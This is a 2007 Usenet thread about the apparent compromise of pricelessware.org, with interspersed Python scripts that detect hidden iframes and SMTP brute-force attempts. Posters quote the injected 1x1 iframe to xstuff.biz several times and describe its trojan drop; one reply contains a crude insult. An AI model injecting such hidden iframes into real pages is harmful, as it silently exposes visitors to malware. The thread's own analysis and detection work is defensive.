I do not believe that was the exact link when I visited, but it was
the xstuff.biz site (I believe the ?out=nnnn was different). Anyway,
it loads up some encoded JavaScript, the JavaScript attempts a few
other things, tries to load Java applets from the "golom" site, and
eventually if that fails or not it redirects you to Google.
I initially thought it redirected if it could not infect, but I
forgot to disable one of my security measures. It redirects upon
infection or not.
It weakly tries to infect your system. Only Internet Explorer is
currently susceptible and only in the least secure of environments.
Also, that link is currently dead...
--
-Lost
Remove the extra words to reply by e-mail. Don't e-mail me. I am
kidding. No I am not.
>>> Has anyone actually experienced any problems relating to
>>> Pricelessware.org?
>>
>>Even if the site was hacked and an iframe was added to an "evil"
>>site, it does not automatically mean you will be infected. My
>>guess is the majority of alt.comp.freeware people are fully
>>patched and I highly doubt that "hack" was using a zero day
>>exploit so it probably didn't hurt anyone.
>
> If you look at the cut/paste Susan posted of the website front
> page, it does show a very suspicious iframe in with a pointer to a
> website hosted in Malaysia. If you know about these things, you
> might like to comment...
I posted to your alert almost 2 days ago about what it was doing.
See: Message-ID: <Xns99DA727ECC...@216.196.97.136>
For my response to Susan in which I give a quick rundown (from
memory) what it was doing.
It is another poor Internet Explorer-only attempt at infecting
compromised boxes.
I'm fully patched and it ran here, so if it was taking advantage of an
unpatched exploit, it was a recent one. The iframe bug shows the site it
calls, but not what the parameter passed triggers. Without AntiVir (and
maybe PrevX backing it up), it would have done its dirty deed.
Cheers.
And that xstuff website was only recently registered on Sep 22. If the
pricelessware.org site was hacked and being played with (the page has
been changing), one of the legitimate maintainers may wish to clear up
any mystery about their intended purpose of that iframe. Then again,
they may not. :-)
Cheers.
Are you too stupid to figure out the obvious on your own?
Don't bother. Rhetorical question.
>
>Sometimes paranoid, I went to the web page Hummingbird posted:
>http://www.prevx.com/filenames/1218068998133982281-X1/IE_UPDATE3R.EXE.html
>where they recommended I scan my computer with:
>Prevx Computer Security Investigator (CSI)
>http://pxnow.prevx.com/zeroL/PREVXCSIFREE.EXE
>1523 KB
>
>so I did. . . the results:
>
><q>
>Security Product AVG 7.5.485 Version 7.5.485
>Windows Windows XP Home Service Pack 2 (Build 2600) 32bit
>Scans 1 (First Scan: Oct 31 4:13 UCT Last Scan: Oct 31 4:17 UCT)
>Files Checked 2,780
>Bad Files 0
>Your Computer Status CLEAN
></q>
Yeah, I also got a clean bill from the scan but AFTER I'd cleaned
the trojan files off my system.
>> dunno what:
>>
>> <iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>> width=1 height=1 frameborder=0>
>>
>> does but I don't think it's good.
>
>still dunno what that link does. . .
Well I wouldn't recommend surfing there, but one of the Anonymous
posters here says he found 66 something or others.
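Rather than surfing to the page in a browser to see what the tag does, a safer first step is to fetch the HTML with a non-browser client and scan it offline for iframes built to be invisible, which is exactly what the quoted tag is (1x1, no border, pointing at a newly registered off-site domain). The script below is an added example written for this page, not code from any of the posters; the page URL and the sample HTML are constructed, with the quoted iframe embedded next to a benign same-site banner frame and a display:none container so that all three cases run offline.

```python
"""Audit a page's HTML for hidden iframes of the kind quoted in the thread.

Added example (not code from the original posts). PAGE_URL and SAMPLE_HTML
are constructed so the scan runs offline; the xstuff.biz tag is the one
quoted above, the other two iframes are made up for contrast.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse, urljoin

PAGE_URL = "http://www.pricelessware.org/"   # assumed origin of the scanned page

SAMPLE_HTML = """
<html><body>
<h1>Pricelessware</h1>
<iframe src="/banner.html" width=468 height=60></iframe>
<iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
 width=1 height=1 frameborder=0></iframe>
<div style="display: none"><iframe src="http://example.invalid/x"></iframe></div>
</body></html>
"""


def _dim(value):
    """'1', '1px', '100%' -> 1, 1, 100; missing or unparseable -> None."""
    if value is None:
        return None
    digits = "".join(ch for ch in value if ch.isdigit())
    return int(digits) if digits else None


def _is_hidden_style(style):
    s = (style or "").replace(" ", "").lower()
    return "display:none" in s or "visibility:hidden" in s


class _IframeAuditor(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = (urlparse(page_url).hostname or "").lower()
        self.stack = []        # (tag, hides_children) for every open element
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)        # html.parser copes with the unquoted width=1 style
        hidden_self = _is_hidden_style(a.get("style"))
        hidden_ancestor = any(h for _, h in self.stack)
        if tag == "iframe":
            self._check(a, hidden_self, hidden_ancestor)
        self.stack.append((tag, hidden_self))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; drops void elements left on the stack.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def _check(self, a, hidden_self, hidden_ancestor):
        reasons = []
        w, h = _dim(a.get("width")), _dim(a.get("height"))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append("tiny")
        if hidden_self:
            reasons.append("hidden-style")
        if hidden_ancestor:
            reasons.append("hidden-ancestor")
        if not reasons:
            return             # a visible frame is not what this check is for
        src = urljoin(self.page_url, a.get("src") or "")
        host = (urlparse(src).hostname or "").lower()
        if host and host != self.page_host and not host.endswith("." + self.page_host):
            reasons.append("external")
        self.findings.append({"src": src, "host": host, "reasons": reasons})


def audit(html, page_url=PAGE_URL):
    """Return a list of {src, host, reasons} for every iframe that is hidden."""
    p = _IframeAuditor(page_url)
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for f in audit(SAMPLE_HTML):
        print(f["host"], ",".join(f["reasons"]), f["src"])
```

A hidden iframe on its own is not proof of compromise (tracking pixels and ad frames use the same trick), so the script reports why each frame was flagged and lets the reader decide; a 1x1 frame to a domain registered a few weeks earlier is the combination worth escalating to the site's maintainers. To use it on a live page, save the HTML with a plain HTTP client rather than a browser and pass the body to audit().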
>Response from Susan Bugher <sebu...@yahoo.com>:
>
><snip>
>
>>> dunno what:
>>>
>>> <iframe
>>> src="http://xstuff.biz/tdsko-xyz/index.php?out=1193378230"
>>> width=1 height=1 frameborder=0>
>>>
>>> does but I don't think it's good.
>>
>> still dunno what that link does. . .
>I do not believe that was the exact link when I visited, but it was
>the xstuff.biz site (I believe the ?out=nnnn was different). Anyway,
>it loads up some encoded JavaScript, the JavaScript attempts a few
>other things, tries to load Java applets from the "golom" site, and
>eventually if that fails or not it redirects you to Google.
Thanks for that info. How come you risked going there at all?
>I initially thought it redirected if it could not infect, but I
>forgot to disable one of my security measures. It redirects upon
>infection or not.
>
>It weakly tries to infect your system. Only Internet Explorer is
>currently susceptible and only in the least secure of environments.
That figures - I use an old ver of Avant which uses the IE engine.
>Also, that link is currently dead...
That appears to confirm what bluerhino found.
>Response from hummingbird <hummi...@2die4.com>:
>
>>>> Has anyone actually experienced any problems relating to
>>>> Pricelessware.org?
>>>
>>>Even if the site was hacked and an iframe was added to a "evil"
>>>site, it does not automatically mean you will be infected. My
>>>guess is the majority of alt.comp.freeware people are fully
>>>patched and I highly doubt that "hack" was using a zero day
>>>exploit so it probably didn't hurt anyone.
>> If you look at the cut/paste Susan posted of the website front
>> page, it does show a very suspicious iframe in with a pointer to a
>> website hosted in Malaysia. If you know about these things, you
>> might like to comment...
>I posted to your alert almost 2 days ago about what it was doing.
>
>See: Message-ID: <Xns99DA727ECC...@216.196.97.136>
That MID was posted today.
>For my response to Susan in which I give a quick rundown (from
>memory) what it was doing.
>
>It is another poor Internet Explorer-only attempt at infecting
>compromised boxes.
Thanks, I've just read that. I'm interested in why you bravely went
to that site to investigate it!
I'd be interested to know the details of what they've done and how
someone was able to hack into the pricelessware site. I know my
ISP's webmail got hacked into in May but I assume that was through
the logon screen.
>hummingbird wrote:
>> On Wed, 31 Oct 2007 13:21:09 +0000 (UTC) 'Aaron'
>> wrote this on alt.comp.freeware:
>>
>>> hm...@yhmmm.org wrote in
>>> news:ItidnfIfsM18lLXa...@giganews.com:
>>>
>>>
>>>> Has anyone actually experienced any problems relating to
>>>> Pricelessware.org?
>>> Even if the site was hacked and an iframe was added to a "evil" site, it
>>> does not automatically mean you will be infected. My guess is the majority
>>> of alt.comp.freeware people are fully patched and I highly doubt that
>>> "hack" was using a zero day exploit so it probably didn't hurt anyone.
>>
>> If you look at the cut/paste Susan posted of the website front page,
>> it does show a very suspicious iframe in with a pointer to a website
>> hosted in Malaysia. If you know about these things, you might like
>> to comment...
>>
>
>And that xstuff website was only recently registered on Sep 22.
Yeah I had noticed that.
>If the
>pricelessware.org site was hacked and being played with (the page has
>been changing), one of the legitimate maintainers may wish to clear up
>any mystery about their intended purpose of that iframe. Then again,
>they may not. :-)
Absolutely. I sent an e-mail to pricelessware's hosting company
yesterday morning to alert them but have received no reply. I'm no
expert on such matters but I don't understand how that site could
actually be hacked into - I mean it doesn't have a logon screen like
my ISP's webmail had when it was hacked into last May by Ruskies.
That hack operated in a similar way - it downloaded trojans onto
peoples' systems and turned them into spam bots.
So it raises some worrying questions...
> My guess is the
> majority of alt.comp.freeware people are fully patched
Risky guess when you look at the numbers of people here using windows 98 or
windows ME.
> Nomen Nescio <nob...@dizum.com> wrote in
> news:b659f56ea6a54777...@dizum.com:
>
>> Yes, dimbulb, that's exactly what I said.
>
> Why are you using an anonymous remailer based in Italy to post to this
> group? Something to hide?
Why are you using a news provider that hides your IP, and not using a valid
email address, to post to this group? Something to hide?
> Nomen Nescio <nob...@dizum.com> wrote in
> news:b659f56ea6a54777...@dizum.com:
>
> > Yes, dimbulb, that's exactly what I said.
>
> Why are you using an anonymous remailer based in Italy to post to
> this group? Something to hide?
*yawn*
None of your business.
>
>hummingbird wrote:
>
>>
>> On Wed, 31 Oct 2007 08:05:22 +0100 (CET) 'Anonymous'
>> wrote this on alt.comp.freeware:
>>
>> >hummingbird wrote:
>> >
>> >>
>> >> On Tue, 30 Oct 2007 15:59:45 -0700 'bluerhinoceros'
>> >> wrote this on alt.comp.freeware:
>> >>
>> >>
>> >> >Hi hmmm:
>> >> >
>> >> >I'm using Avira Antivir Personal Edition Classic. I also use Prevx
>> >> >2.0, but it didn't notice anything, presumably because AntiVir was
>> >> >earlier in the food chain.
>> >> >
>> >> >I then used Avira to scan the whole drive, followed by a reboot,
>> >> >another sweep and a going over with Prevx, Spybot and AdAware for
>> >> >good measure.
>> >>
>> >> See my comments about Spybot and AdAware. Neither picked up the
>> >> trojan files on my HDD.
>> >
>> >Neither one of them SHOULD.
>>
>> Are you going to say why?
>
>Are you too stupid to figure out the obvious on your own?
I'll take that as a No, you don't know.
>Don't bother. Rhetorical question.
I've noticed you posting a lot of rhetoric.
>--
>Posted to alt.comp.freeware
>Search alt.comp.freeware (or read it online):
>http://www.google.com/advanced_group_search?q=+group:alt.comp.freeware
>Pricelessware & ACF: http://www.pricelesswarehome.org
>Pricelessware: http://www...pricelessware...org (not maintained)
Your sig is still advertising the OLD pricelessware site Susan...!
>
> On Wed, 31 Oct 2007 17:19:02 +0000 (UTC) 'Anonymous Sender'
> wrote this on alt.comp.freeware:
>
>>hummingbird wrote:
>>
>>>
>>> On Wed, 31 Oct 2007 08:05:22 +0100 (CET) 'Anonymous'
>>> wrote this on alt.comp.freeware:
>>>
>>> >hummingbird wrote:
>>> >
>>> >>
>>> >> On Tue, 30 Oct 2007 15:59:45 -0700 'bluerhinoceros'
>>> >> wrote this on alt.comp.freeware:
>>> >>
>>> >>
>>> >> >Hi hmmm:
>>> >> >
>>> >> >I'm using Avira Antivir Personal Edition Classic. I also use
>>> >> >Prevx 2.0, but it didn't notice anything, presumably because
>>> >> >AntiVir was earlier in the food chain.
>>> >> >
>>> >> >I then used Avira to scan the whole drive, followed by a
>>> >> >reboot, another sweep and a going over with Prevx, Spybot and
>>> >> >AdAware for good measure.
>>> >>
>>> >> See my comments about Spybot and AdAware. Neither picked up
>>> >> the trojan files on my HDD.
>>> >
>>> >Neither one of them SHOULD.
>>>
>>> Are you going to say why?
>>
>>Are you too stupid to figure out the obvious on your own?
>
> I'll take that as a No, you don't know.
>
>
>>Don't bother. Rhetorical question.
>
> I've noticed you posting a lot of rhetoric.
>
No one posts more windy rhetoric than you, Hummingbird.
You've been foolish by having no defense. Now you bleat open mouthed
that such a terrible thing has happened to you.
It's no big deal. If you had set your security properly then the
changes to pricelessware.org do no harm. I and, I'm sure, many
others browsed the bad page without changing any settings.
Similarly, you probably take no precautions when having sex in
Thailand. Can you spell AIDS?
>>I do not believe that was the exact link when I visited, but it
>>was the xstuff.biz site (I believe the ?out=nnnn was different).
>>Anyway, it loads up some encoded JavaScript, the JavaScript
>>attempts a few other things, tries to load Java applets from the
>>"golom" site, and eventually if that fails or not it redirects you
>>to Google.
>
> Thanks for that info. How come you risked going there at all?
The truth? I am a hardheaded code sniffer.
Or an odd term that I heard a random hacker say once, "I wanna' know
why so I can deny." Of course they were not referring to liability
only malicious code.
>>> See my comments about Spybot and AdAware. Neither picked up the
>>> trojan files on my HDD.
>>
>>Neither one of them SHOULD.
>
> Are you going to say why?
Technically speaking an "adware" or "spyware" program should not be
searching for viruses, trojans, backdoors, et cetera.
However, the terms in general have become somewhat ambiguous in the
industry that deals with them vendor-wise, so more and more adware
and spyware cleaning vendors have resorted to detecting and cleaning
more than just adware and spyware.
Same with firewalls doing more than blocking inbound/outbound access.
So your confusion is notably understood.
Jeez, did I say adware and spyware enough times?
>>I posted to your alert almost 2 days ago about what it was doing.
My response about your ALERT thread.
>>See: Message-ID: <Xns99DA727ECC...@216.196.97.136>
>
> That MID was posted today.
>
>>For my response to Susan in which I give a quick rundown (from
>>memory) what it was doing.
Above and below your current response is my response about the post I
issued to Susan of which I gave you the Message-ID.
(You jumped the gun on responding evidently.)
>>It is another poor Internet Explorer-only attempt at infecting
>>compromised boxes.
>
> Thanks, I've just read that. I'm interested in why you bravely went
> to that site to investigate it!
I said it already in another post, but being the mostly friendly
humanoid that I am I will repeat a little.
I am hardheaded. I like to see if my security measures are decent,
and if I do get infected I like being able to get out of it
relatively easy. When I cannot reverse the changes easily enough it
is time to revamp security.
> I'd be interested to know the details of what they've done and how
> someone was able to hack into the pricelessware site. I know my
> ISP's webmail got hacked into in May but I assume that was through
> the logon screen.
JavaScript, Java, ActiveX, unsigned controls that only Internet
Explorer might be susceptible to, redirects to more code and some
other junk... I have the original 1st redirect code, but it wasn't
impressive from what I remember. So I didn't dig further.
And there are at least a million ways someone could have hacked into
the site. The site owner could be using content publishing or
blogging software that had a security hole, the web cracker could
have scanned the server software and saw a possibly unpatched system
and tried the known exploits, they could have used a simple
dictionary attack (highly unlikely but not at all impossible), and
there are just too many others to mention.
I am still amazed to this day when I can log on to a commercial or
personal workstation and use a simple password to get in. Or how
many dish their passwords out without me even asking. I read somewhere
(I forget where, but I am sure it could be found easily enough) that
the most commonly used password still in use today is "admin."
Anyway, this topic is off-topic enough. I think...
>Response from hummingbird <hummi...@2die4.com>:
>
>>>> See my comments about Spybot and AdAware. Neither picked up the
>>>> trojan files on my HDD.
>>>
>>>Neither one of them SHOULD.
>>
>> Are you going to say why?
>
>Technically speaking an "adware" or "spyware" program should not be
>searching for viruses, trojans, backdoors, et cetera.
>
>However, the terms in general have become somewhat ambiguous in the
>industry that deals with them vendor-wise, so more and more adware
>and spyware cleaning vendors have resorted to detecting and cleaning
>more than just adware and spyware.
>
>Same with firewalls doing more than blocking inbound/outbound access.
>So your confusion is notably understood.
>
>Jeez, did I say adware and spyware enough times?
Yeah OK but a major part of SpyBot S&D today is devoted to checking
for trojans, viruses, browser hijackers, keyloggers etc etc, so one
can safely assume that the product name doesn't reflect its intended
role. That it didn't pick up one of those 8 files on my HDD is
worrying given that so many people think it's the bees knees.
W/r/t/ AdAware, I didn't really expect it to check/find those items
but it did find the regkey.
>I am hardheaded. I like to see if my security measures are decent,
>and if I do get infected I like being able to get out of it
>relatively easy. When I cannot reverse the changes easily enough it
>is time to revamp security.
sounds reasonable.
>> I'd be interested to know the details of what they've done and how
>> someone was able to hack into the pricelessware site. I know my
>> ISP's webmail got hacked into in May but I assume that was through
>> the logon screen.
>
>JavaScript, Java, ActiveX, unsigned controls that only Internet
>Explorer might be susceptible to, redirects to more code and some
>other junk... I have the original 1st redirect code, but it wasn't
>impressive from what I remember. So I didn't dig further.
>
>And there are at least a million ways someone could have hacked into
>the site. The site owner could be using content publishing or
>blogging software that had a security hole, the web cracker could
>have scanned the server software and saw a possibly unpatched system
>and tried the known exploits, they could have used a simple
>dictionary attack (highly unlikely but not at all impossible), and
>there are just too many others to mention.
Interesting, thanks.
>I am still amazed to this day when I can log on to a commercial or
>personal workstation and use a simple password to get in. Or how
>many dish their passwords out without me even asking. I forget where
>I read somewhere (I forget where but I am sure it could be found
>easily enough) that the most commonly used password still in use
>today is "admin."
I run my own SMTP mail server and several weeks ago, a Chinese
IP address tried a brute force attack to get in ... 200+ attempts
in 20 mins. I sent an abuse report and the log to the ISP...
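The pattern hummingbird describes (200+ attempts from one address inside 20 minutes) is easy to pick out of a mail log with a sliding-window count of failed AUTH attempts per client IP, which also produces the per-address totals an abuse report needs. What follows is an added example, not code from the thread: the log lines are constructed in a Postfix/SASL-style syslog format (adjust LOG_RE for another server), and the year is assumed to be 2007 because syslog timestamps omit it.

```python
"""Sliding-window detection of SMTP AUTH brute force in a mail log.

Added example, not code from the thread. The log lines are constructed in a
Postfix/SASL-style syslog format; the year is assumed (syslog omits it).
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ \S+: warning: "
    r"\S+\[(?P<ip>[\d.]+)\]: SASL \w+ authentication failed"
)
ASSUMED_YEAR = 2007


def _parse_ts(ts, year=ASSUMED_YEAR):
    """'Nov  3 04:00:00' -> datetime, collapsing the space-padded day field."""
    return datetime.strptime(f"{year} {' '.join(ts.split())}", "%Y %b %d %H:%M:%S")


def _make_sample():
    """Constructed log: 200 failures from one address in 20 minutes (one every
    6 s), three stray failures from another over 50 minutes, one non-auth line."""
    base = datetime(ASSUMED_YEAR, 11, 3, 4, 0, 0)
    fmt = ("{:%b %d %H:%M:%S} mail smtpd[4242]: warning: unknown[{}]: "
           "SASL {} authentication failed")
    lines = [fmt.format(base + timedelta(seconds=6 * i), "198.51.100.7", "LOGIN")
             for i in range(200)]
    lines += [fmt.format(base + timedelta(minutes=25 * i), "203.0.113.9", "PLAIN")
              for i in range(3)]
    lines.append(f"{base:%b %d %H:%M:%S} mail smtpd[4242]: connect from unknown[203.0.113.9]")
    return sorted(lines)   # fixed-width timestamps, so string order is time order


SAMPLE_LOG = _make_sample()


def detect(lines, threshold=20, window=timedelta(minutes=10)):
    """Return {ip: {"first": dt, "at": dt, "count": n}} for each client that
    reaches `threshold` failed AUTH attempts within any span of length `window`.
    Lines must be in time order; lines that do not match LOG_RE are ignored."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still in the window
    alerts = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, t = m.group("ip"), _parse_ts(m.group("ts"))
        q = recent[ip]
        q.append(t)
        while t - q[0] > window:   # q is never empty here: t was just appended
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = {"first": q[0], "at": t, "count": len(q)}
    return alerts


def count_failures(lines):
    """Total failed AUTH attempts per client IP, for the abuse report."""
    totals = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            totals[m.group("ip")] += 1
    return dict(totals)


if __name__ == "__main__":
    for ip, a in detect(SAMPLE_LOG).items():
        print(f"{ip}: {a['count']} failures between "
              f"{a['first']:%H:%M:%S} and {a['at']:%H:%M:%S}")
    print(count_failures(SAMPLE_LOG))
```

The window is the part that matters: three failures spread over an hour is a user mistyping a password, the same three inside a second is a script, so the threshold and window belong together and should be tuned to the server's real traffic before the output is used to block anything.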
> Response from hummingbird <hummi...@2die4.com>:
>
>>>> See my comments about Spybot and AdAware. Neither picked up the
>>>> trojan files on my HDD.
>>>
>>>Neither one of them SHOULD.
>>
>> Are you going to say why?
>
> Technically speaking an "adware" or "spyware" program should not be
> searching for viruses, trojans, backdoors, et cetera.
>
> However, the terms in general have become somewhat ambiguous in the
> industry that deals with them vendor-wise, so more and more adware
> and spyware cleaning vendors have resorted to detecting and
> cleaning more than just adware and spyware.
>
> Same with firewalls doing more than blocking inbound/outbound
> access. So your confusion is notably understood.
>
> Jeez, did I say adware and spyware enough times?
>
Hello -Lost
Of course you're right but don't expect Hummingbird to accept the truth
of the matter without further quibbling and point scoring.
Adware/spyware is a fairly well defined group. What has changed lately
is that some adware uses methods that behave more like trojans:
self-replicating software, hidden software, hard to remove components,
etc etc.
Nowadays adware detectors have to detect these extra methods and this
seems to have encouraged the adware detectors to include some
fingerprints for malware like trojans and viruses.
As we know, most adware detectors do this only as a "fringe" service to
their main purpose and they can hardly be relied upon to find malware.
It must be hard for n00bs to properly protect themselves when these
adware detectors claim to do so many things.
Software personal firewalls are another category where this function
creep has been happening. Whether you approve or disapprove of a SPF
(and that is a whole separate debate) it's clear that a SPF is extending
its function when it tries to detect all malware entering via SMTP. It
may be nice to have this but it's not really a solid replacement for
software which provides thorough AV protection.
----
Some people like to have layered defenses and if they get this extra
half-thorough function for free then it could be seen as an extra layer.
As before, one big problem is when a n00b thinks his SPF will actually
protect him against all malicious email attachments and do it as well as
a full-spec AV utility.
It must be better to use best-of-class apps for protection than rely on
some add-on features to an app which comes from a different class.
Franklin
Can you send any files SUPERAntiSpyware missed to samples AT
superantispyware.com? I will update our definitions to detect/remove
them as necessary.
>> I'm fully patched and it ran here,
>
> Actually from your description, it didn't actually run, but rather your
> security detected something..Not quite the same as you know.
Depends on whether the OP was meaning the initial execution was as a
result of an exploit, which is what I was replying to. However, it is a
distinction worth making, and point taken.
> The iframe bug shows the site
>> it calls, but not what the parameter passed triggers. Without AntiVir
>> (and maybe PrevX backing it up), it would have done its dirty deed.
>>
>
> Actually you can only be sure of that if you go there without them and
> get infected. Did you?
Well, maybe. :-)
When Avira detected a file, I nuked the current activities and did a
series of complete system scans. In addition to the quarantined file,
another was found in (I believe) a Java cache folder. So if the file
getting through to the hard disk qualifies as infected, then yes.
Cheers.
>On Oct 31, 8:46 am, hummingbird <hummingb...@2die4.com> wrote:
>> Good point. I dunno. I give up. What SAS actually found were 4 of
>> the files which it said were fake 'svchost' files. In fact there was
>> only one of them (filename: _svchost.exe) and the other 3 were
>> obviously related to it. But it missed the other 4 files.
>> (of course I'd already identified and disabled all of them myself)
>>
>> btw - my use of the term trojan in these threads is taken from
>> the link I posted which calls this crapware: Trojan.SystemPoser.
>>
>> My hunch is that it tries to install a keylogger onto your system
>> and sends data and browser images back to its mothership ...
>> presumably with your bank/credit card details etc .. but I have
>> no conclusive evidence of that.
>Can you send any files SUPERAntiSpyware missed to samples AT
>superantispyware.com? I will update our definitions to detect/remove
>them as necessary.
I'll be happy to do that if you can tell me how to wrap them up.
Would a standard zipfile be ok? ... and should I address it to a
particular person?
> When I finished my last system reinstallation (I usually reinstall every 18
> months or so), I didn't load Sun Java. My experience has been that most of
> the trojan alerts or infections found during a bootscan were usually in the
> Sun Java cache or some other script file. So far, I haven't missed Sun
> Java, but if someone can tell me how it greatly enhances my net experience,
> I might reinstall it.
I hear you. Unfortunately, I need Java for some key business
functionality, or I'd nuke it too. I'm not a fan.
Cheers.
>hummingbird <hummi...@2die4.com> wrote in
>news:862ba8504f7b978b...@localhost.127.0.0.1:
>
>> W/r/t/ AdAware, I didn't really expect it to check/find those items
>> but it did find the regkey.
>
>Which version of Ad-Aware, the new or the old.
>I still have the old freeware version loaded, as many say the new one is
>bloated. Do they both install the same definition files?
I'm still using the old one too but have tried to update the sig
files twice in recent days without success. Again just now.....
guess I'll have to go to the website and download manually.
>hummingbird <hummi...@2die4.com> wrote in
>news:62154e0f99b789f2...@localhost.127.0.0.1:
>
>> I'm still using the old one too but have tried to update the sig
>> files twice in recent days without success. Again just now.....
>> guess I'll have to go to the website and download manually.
>
>also using v 1.06r1 and was just able to update automatically to 29.10.2007
>definition file.
That's weird - I keep getting an error when it tries to download.
I'll keep trying - thanks for letting me know that it does actually
work, I thought maybe they'd cut access for the old free version
to force us onto the new one.
Ditto. I have a few Java applications that I rely on -- otherwise I
have Java disabled at every turn.
Admittedly though it is a key device for Web chat, rough animation,
or games for those who do not wish to deal with Flash. Which is the
lesser of two evils I've no idea.
>> When Avira detected a file, I nuked the current activities and did a
>> series of complete system scans. In addition to the quarantined file,
>> another was found in (I believe) a Java cache folder. So if the file
>> getting through to the hard disk qualifies as infected, then yes.
>
> False again. Shows you are still missing the point.
What part of "if" didn't you understand?
>On Oct 31, 8:46 am, hummingbird <hummingb...@2die4.com> wrote:
>> Good point. I dunno. I give up. What SAS actually found were 4 of
>> the files which it said were fake 'svchost' files. In fact there was
>> only one of them (filename: _svchost.exe) and the other 3 were
>> obviously related to it. But it missed the other 4 files.
>> (of course I'd already identified and disabled all of them myself)
>>
>> btw - my use of the term trojan in these threads is taken from
>> the link I posted which calls this crapware: Trojan.SystemPoser.
>>
>> My hunch is that it tries to install a keylogger onto your system
>> and sends data and browser images back to its mothership ...
>> presumably with your bank/credit card details etc .. but I have
>> no conclusive evidence of that.
>Can you send any files SUPERAntiSpyware missed to samples AT
>superantispyware.com? I will update our definitions to detect/remove
>them as necessary.
ok I sent them off this morning to the address you asked...
> And I'm telling you running a java applet does not qualify as being
> infected. Not unless the applet manages to do something it was not supposed
> to do.
OK, this I hear. But where's that "not supposed to do" line? If the
applet managed to write other malicious files to the hard drive, could
that not be as a result of doing something it wasn't supposed to do?
> You are trying to backtrack from your earlier comments that you were
> infected if not for the protection of your AV, and I'm telling you this was
> not the case.
I'm actually trying to understand. My original quote was "I'm fully patched
and it ran here, so if it was taking advantage of an unpatched exploit,
it was a recent one. The iframe bug shows the site it calls, but not
what the parameter passed triggers. Without AntiVir (and maybe PrevX
backing it up), it would have done its dirty deed."
I agree I would probably have been better advised to have used
"SOMETHING ran here" rather than "IT ran here", and "may have done"
rather than "would have done", but as we don't know "what the parameter
passed triggers", we don't know that it was only a java app being
executed/dropped/called by that script.
And in reply to your question about whether I was infected, I did say
"maybe" and "if the file getting through... qualifies...". I still don't
see any reason to "backtrack" from that statement, I see it as a
legitimate uncertainty. The file (detected by a later file scan, but not
when it was created) could have landed there by the action of a process
that was taking advantage of an unpatched vulnerability, couldn't it,
javascript initiated or not? This is normally the realm of a (trojan)
dropper, but is it not possible as the result of an exploit?
In short, let me be clear, then, that if my earlier posts conveyed a
definite assertion that "I was infected if not for the protection of
(my) AV", I humbly recant those statements, and would like to move on.
If I sound confused, it's because I am. Any assistance in clarifying
these muddy matters is welcome.
I appreciate your reasoned discourse rather than inflammatory language.
Cheers.